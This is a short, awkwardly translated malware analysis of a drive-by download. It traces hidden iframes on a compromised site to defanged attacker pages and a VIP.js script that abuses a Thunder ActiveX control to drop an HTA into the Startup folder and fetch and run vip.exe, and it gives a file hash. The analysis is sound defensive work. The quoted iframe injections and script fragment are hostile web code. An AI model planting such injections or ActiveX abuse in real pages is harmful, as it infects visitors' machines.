EndurerOriginal
1Version
When browsing the website, Kaspersky reports: Malicious Script: Access denied.
Check the webpage and find the code:
/---
<IFRAME src = hxxp: // x *. K * o * 5 *** 1.com/index.htm width = 50 height = 0> </iframe>
---/
Hxxp: // x *. K * o * 5 *** 1.com/index.htmCode included:
/---
<IFRAME src = "hxxp: // x *. K * o * 5 *** 1.com/vip.htm" Height = 0 width = 0> </iframe>
<IFRAME src = "hxxp: // x *. K * o * 5 *** 1.com/vip1.htm" Height = 0 width = 0> </iframe>
<IFRAME src = "hxxp: // x *. K * o * 5 *** 1.com/vip2.htm" Height = 0 width = 0> </iframe>
---/
Hxxp: // x *. K * o * 5 *** 1.com/vip.htmContent:
/---
<SCRIPT src = "VIP. js"> </SCRIPT>
<Body onload = shit ();> <br>
---/
Shit () is defined in VIP. JS:
/---
Function shit ()
{
Try {qianxu_fan = new activexobject ("thunderserver. webthunder.1 ");}
Catch (e) {return ;}
---/
Used to create activexobject "thunderserver. webthunder.1 ".
VIP. jsImplementation using it:
Use ADODB to create a file: C:/Documents and Settings/all users/Start Menu/Program/start/Microsofts. HTA
Use shell. Run to call IE to open the webpage hxxp: // www. Mv ***** PS * f.com/kl/vip.exevips.htmand download the Virus File vip.exe
Use shell.execto run the Virus File vip5111).exe that is downloaded to the IE folder.
File Description: D:/test/vip.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 21:34:52
Modification time: 21:34:54
Access time:
Size: 191972 bytes, 187.484 KB
MD5: 1ac930db8829347b86517eae9cc56c0e
Rising news:Worm. win32.agent.
Hxxp: // x *. K * o * 5 *** 1.com/vip1.htmContent is US-ASCII encoding. To the http://purpleendurer.ys168.com download US-ASCII decoding program for decryption, get JavaScript code, function is to download kl.exe, save as C:/Microsoft.com, run using Shell. Application.
View-source: hxxp: // x *. K * o * 5 *** 1.com/vip2.htmContent is US-ASCII encoding. Decrypt the JavaScript code to download kl.exe, save it as C:/Microsoft.com, and create Microsoft. vbs to run it.
Kl.exe does not exist.